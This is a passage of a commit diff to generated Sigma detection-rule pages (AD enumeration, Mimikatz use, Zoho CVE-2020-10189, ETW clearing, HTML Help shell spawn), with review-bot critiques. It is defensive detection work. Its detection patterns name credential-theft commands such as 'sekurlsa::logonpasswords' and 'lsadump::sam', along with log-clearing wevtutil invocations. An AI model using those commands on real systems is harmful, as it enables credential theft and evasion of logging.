grep -P '^(?:.*(?=.*(?:.*(?=.*7)(?=.*(?:.*.*\\wmiclnt\\.dll|.*.*\\WmiApRpl\\.dll|.*.*\\wmiprov\\.dll|.*.*\\wmiutils\\.dll|.*.*\\wbemcomn\\.dll|.*.*\\wbemprox\\.dll|.*.*\\WMINet_Utils\\.dll|.*.*\\wbemsvc\\.dll|.*.*\\fastprox\\.dll))))(?=.*(?!.*(?:.*(?=.*(?:.*.*\\WmiPrvSe\\.exe|.*.*\\WmiAPsrv\\.exe|.*.*\\svchost\\.exe))))))'
grep -P '^(?:.*(?=.*(?:.*(?=.*7)(?=.*(?:.*.*\\wmiclnt\\.dll|.*.*\\WmiApRpl\\.dll|.*.*\\wmiprov\\.dll|.*.*\\wmiutils\\.dll|.*.*\\wbemcomn\\.dll|.*.*\\wbemprox\\.dll|.*.*\\WMINet_Utils\\.dll|.*.*\\wbemsvc\\.dll|.*.*\\fastprox\\.dll))))(?=.*(?!.*(?:.*(?=.*(?:.*.*\\WmiPrvSe\\.exe|.*.*\\WmiPrvSE\\.exe|.*.*\\WmiAPsrv\\.exe|.*.*\\svchost\\.exe))))))'
```
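Review bot: the e-mail body template in the xpack-watcher output above has no line break between `ImageLoaded = {{_source.ImageLoaded}}` and the `====` separator, whereas the other watchers on this page put `\\n` before the separator; each hit's last field will run straight into the divider. Suggest fixing the fields template that the backend expands for this rule so a newline precedes the separator.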

View File

@ -0,0 +1,98 @@
| Title | AD User Enumeration |
|:-------------------------|:------------------|
| **Description** | Detects access to a domain user from a non-machine account |
| **ATT&amp;CK Tactic** | <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul> |
| **Data Needed** | <ul><li>[DN_0030_4662_operation_was_performed_on_an_object](../Data_Needed/DN_0030_4662_operation_was_performed_on_an_object.md)</li></ul> |
| **Trigger** | <ul><li>[T1087: Account Discovery](../Triggers/T1087.md)</li></ul> |
| **Severity Level** | medium |
| **False Positives** | <ul><li>Administrators configuring new users.</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)</li><li>[http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html](http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html)</li><li>[https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all](https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all)</li></ul> |
| **Author** | Maxime Thiebaut (@0xThiebaut) |
## Detection Rules
### Sigma rule
```
title: AD User Enumeration
id: ab6bffca-beff-4baa-af11-6733f296d57a
description: Detects access to a domain user from a non-machine account
status: experimental
date: 2020/03/30
author: Maxime Thiebaut (@0xThiebaut)
references:
- https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
- http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html
- https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties
tags:
- attack.discovery
- attack.t1087
logsource:
product: windows
service: security
definition: Requires the "Read all properties" permission on the user object to be audited for the "Everyone" principal
detection:
selection:
EventID: 4662
ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
- 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user)
filter:
- SubjectUserName|endswith: '$' # Exclude machine accounts
- SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
condition: selection and not filter
falsepositives:
- Administrators configuring new users.
level: medium
```
### es-qs
```
((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/ab6bffca-beff-4baa-af11-6733f296d57a <<EOF\n{\n "metadata": {\n "title": "AD User Enumeration",\n "description": "Detects access to a domain user from a non-machine account",\n "tags": [\n "attack.discovery",\n "attack.t1087"\n ],\n "query": "((EventID:\\"4662\\" AND ObjectType.keyword:(*bf967aba\\\\-0de6\\\\-11d0\\\\-a285\\\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"4662\\" AND ObjectType.keyword:(*bf967aba\\\\-0de6\\\\-11d0\\\\-a285\\\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'AD User Enumeration\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
```
### splunk
```
((EventID="4662" (ObjectType="*bf967aba-0de6-11d0-a285-00aa003049e2*")) NOT (SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" (event_id="4662" ObjectType IN ["*bf967aba-0de6-11d0-a285-00aa003049e2*"]) -(SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*4662)(?=.*(?:.*.*bf967aba-0de6-11d0-a285-00aa003049e2.*))))(?=.*(?!.*(?:.*(?:.*(?=.*.*\\$)|.*(?=.*MSOL_.*))))))'
```
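Review bot: the selection matches any 4662 on a user-class object regardless of `AccessMask` or `Properties`, so once the SACL described in `definition` (Read all properties audited for Everyone) is in place, every address-book lookup, logon-script attribute read or help-desk query by an ordinary account produces a hit; the single falsepositives entry (administrators configuring new users) understates this considerably. Suggest either constraining on the property GUIDs that the referenced BloodHound write-up identifies as characteristic of enumeration, or adding an aggregation (`condition: selection and not filter | count() by SubjectUserName > N` with a `timeframe`) so that only bulk reads alert, and documenting the expected event volume in `definition`. Note also that `SubjectUserName|endswith: '$'` excludes machine accounts, which fits the stated scope, but a collector run under a compromised computer account is then invisible to the rule.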

View File

@ -61,21 +61,21 @@ level: critical
### es-qs
```
Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ 3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)
Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ <3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/06d71506-7beb-4f22-8888-e2e5e2ca7fd8 <<EOF\n{\n "metadata": {\n "title": "Mimikatz Use",\n "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)",\n "tags": [\n "attack.s0002",\n "attack.t1003",\n "attack.lateral_movement",\n "attack.credential_access",\n "car.2013-07-001",\n "car.2019-04-004"\n ],\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ 3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ 3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Mimikatz Use\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n 
}\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/06d71506-7beb-4f22-8888-e2e5e2ca7fd8 <<EOF\n{\n "metadata": {\n "title": "Mimikatz Use",\n "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)",\n "tags": [\n "attack.s0002",\n "attack.t1003",\n "attack.lateral_movement",\n "attack.credential_access",\n "car.2013-07-001",\n "car.2019-04-004"\n ],\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ <3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ <3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Mimikatz Use\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n 
}\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
Message.keyword:(* mimikatz * * mimilib * * 3 eo.oe * * eo.oe.kiwi * * privilege\\:\\:debug * * sekurlsa\\:\\:logonpasswords * * lsadump\\:\\:sam * * mimidrv.sys * * p\\:\\:d * * s\\:\\:l *)
Message.keyword:(* mimikatz * * mimilib * * <3 eo.oe * * eo.oe.kiwi * * privilege\\:\\:debug * * sekurlsa\\:\\:logonpasswords * * lsadump\\:\\:sam * * mimidrv.sys * * p\\:\\:d * * s\\:\\:l *)
```
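Review bot: `<` is a reserved range operator in the Elasticsearch `query_string` syntax and, per the Elasticsearch documentation, cannot be escaped, so the restored `<3\\ eo.oe` term in the es-qs and xpack-watcher output above (and in the graylog query, which uses the same syntax) may be parsed as a range comparison on the default field rather than as the literal string `<3 eo.oe`; the previous version had dropped the character, which is why the term read `3 eo.oe`. Suggest verifying the query against a live index; if it does not parse as intended, drop the `<3` term for these backends and rely on `eo.oe.kiwi` and the remaining keywords, or express the keyword list with a `Message|contains` modifier so the backend can emit a non-`query_string` match.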

View File

@ -1,4 +1,4 @@
| Title | Judgement Panda Exfil Activity |
| Title | Judgement Panda Credential Access Activity |
|:-------------------------|:------------------|
| **Description** | Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike |
| **ATT&amp;CK Tactic** | <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul> |
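Review bot: the description on the line above still reads "Detects Russian group activity", but in CrowdStrike's naming scheme the Panda suffix denotes a China-nexus adversary (Bear is the Russia-nexus suffix), so Judgement Panda is a Chinese group; since this commit already renames the rule, the description should be corrected in the same change, e.g. "Detects Judgement Panda (China-nexus) credential access activity as described in CrowdStrike's Global Threat Report 2019". The same wording is repeated in the Sigma source and in the generated watcher metadata further down and needs the same fix.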
@ -17,7 +17,7 @@
### Sigma rule
```
title: Judgement Panda Exfil Activity
title: Judgement Panda Credential Access Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
references:
@ -59,7 +59,7 @@ level: critical
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <<EOF\n{\n "metadata": {\n "title": "Judgement Panda Exfil Activity",\n "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",\n "tags": [\n "attack.credential_access",\n "attack.t1081",\n "attack.t1003"\n ],\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Judgement Panda Exfil Activity\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <<EOF\n{\n "metadata": {\n "title": "Judgement Panda Credential Access Activity",\n "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",\n "tags": [\n "attack.credential_access",\n "attack.t1081",\n "attack.t1003"\n ],\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Judgement Panda Credential Access Activity\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
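Review bot: the rename to "Judgement Panda Credential Access Activity" matches the `attack.credential_access` tag already in the metadata block, but the watch definition is still emitted with shell-escaped quotes (`\'Content-Type: application/json\'`) and literal `\n` sequences, so the rendered curl command cannot be pasted into a shell as-is; the generator should write the heredoc body unescaped with real line breaks.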

View File

@ -6,8 +6,8 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1070: Indicator Removal on Host](../Triggers/T1070.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | There are no documented False Positives for this Detection Rule yet |
| **Development Status** | Development Status wasn't defined for this Detection Rule yet |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil)</li><li>[https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml)</li><li>[https://abuse.io/lockergoga.txt](https://abuse.io/lockergoga.txt)</li></ul> |
| **Author** | @neu5ron, Florian Roth |
| Other Tags | <ul><li>car.2016-04-002</li></ul> |
@ -20,6 +20,7 @@
title: Disable of ETW Trace
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
status: experimental
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml
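Review bot: `status: experimental` is inserted after `description` here, whereas the other rules in this commit place it directly after `id` (the CVE-2020-10189 and HTML Help Shell Spawn rules below); keep the key order consistent so the generated tables and any rule linting treat every file the same way.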
@ -44,6 +45,8 @@ detection:
selection_disable_2:
CommandLine: '* set-log* /e:false*'
condition: selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2
falsepositives:
- Unknown
```
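Review bot: `- Unknown` under `falsepositives` is a non-entry that will render as a bullet reading "Unknown"; the rule matches `wevtutil` clear and `set-log* /e:false` invocations, so either name the administrative activity known to produce them or leave the list empty rather than adding a placeholder value.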

View File

@ -0,0 +1,97 @@
| Title | Exploited CVE-2020-10189 Zoho ManageEngine |
|:-------------------------|:------------------|
| **Description** | Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
| **ATT&amp;CK Tactic** | <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1190: Exploit Public-Facing Application](../Triggers/T1190.md)</li></ul> |
| **Severity Level** | critical |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li><li>[https://nvd.nist.gov/vuln/detail/CVE-2020-10189](https://nvd.nist.gov/vuln/detail/CVE-2020-10189)</li><li>[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189)</li><li>[https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224](https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224)</li></ul> |
| **Author** | Florian Roth |
## Detection Rules
### Sigma rule
```
title: Exploited CVE-2020-10189 Zoho ManageEngine
id: 846b866e-2a57-46ee-8e16-85fa92759be7
status: experimental
description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-10189
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
- https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
author: Florian Roth
date: 2020/03/25
tags:
- attack.initial_access
- attack.t1190
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
Image|endswith:
- '*\cmd.exe'
- '*\powershell.exe'
- '*\bitsadmin.exe'
condition: selection
falsepositives:
- Unknown
level: critical
```
### es-qs
```
(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/846b866e-2a57-46ee-8e16-85fa92759be7 <<EOF\n{\n "metadata": {\n "title": "Exploited CVE-2020-10189 Zoho ManageEngine",\n "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",\n "tags": [\n "attack.initial_access",\n "attack.t1190"\n ],\n "query": "(ParentImage.keyword:*DesktopCentral_Server\\\\\\\\jre\\\\\\\\bin\\\\\\\\java.exe AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:*DesktopCentral_Server\\\\\\\\jre\\\\\\\\bin\\\\\\\\java.exe AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Exploited CVE-2020-10189 Zoho ManageEngine\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe *\\\\powershell.exe *\\\\bitsadmin.exe))
```
### splunk
```
(ParentImage="*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe" (Image="*\\\\cmd.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\bitsadmin.exe"))
```
### logpoint
```
(event_id="1" ParentImage="*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe" Image IN ["*\\\\cmd.exe", "*\\\\powershell.exe", "*\\\\bitsadmin.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*.*DesktopCentral_Server\\jre\\bin\\java\\.exe)(?=.*(?:.*.*\\cmd\\.exe|.*.*\\powershell\\.exe|.*.*\\bitsadmin\\.exe)))'
```
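Review bot: the `Image|endswith` values `'*\cmd.exe'`, `'*\powershell.exe'` and `'*\bitsadmin.exe'` carry a leading `*` that the `endswith` modifier already implies; the HTML Help Shell Spawn rule in this same commit writes them as `'\cmd.exe'`, and both produce the same `*\\\\cmd.exe` es-qs output, so drop the redundant wildcard for consistency. Severity `critical` with `falsepositives: Unknown` should also be revisited once the rule has been run against real Desktop Central hosts, since `java.exe` spawning `cmd.exe` from that install path is the only discriminator.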

View File

@ -0,0 +1,103 @@
| Title | HTML Help Shell Spawn |
|:-------------------------|:------------------|
| **Description** | Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm) |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1223: Compiled HTML File](../Triggers/T1223.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/)</li></ul> |
| **Author** | Maxim Pavlunin |
## Detection Rules
### Sigma rule
```
title: HTML Help Shell Spawn
id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
status: experimental
description: Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
references:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
author: Maxim Pavlunin
date: 2020/04/01
modified: 2020/04/03
tags:
- attack.execution
- attack.defense_evasion
- attack.t1223
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage: 'C:\Windows\hh.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\regsvr32.exe'
- '\wmic.exe'
- '\rundll32.exe'
condition: selection
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- unknown
level: high
```
### es-qs
```
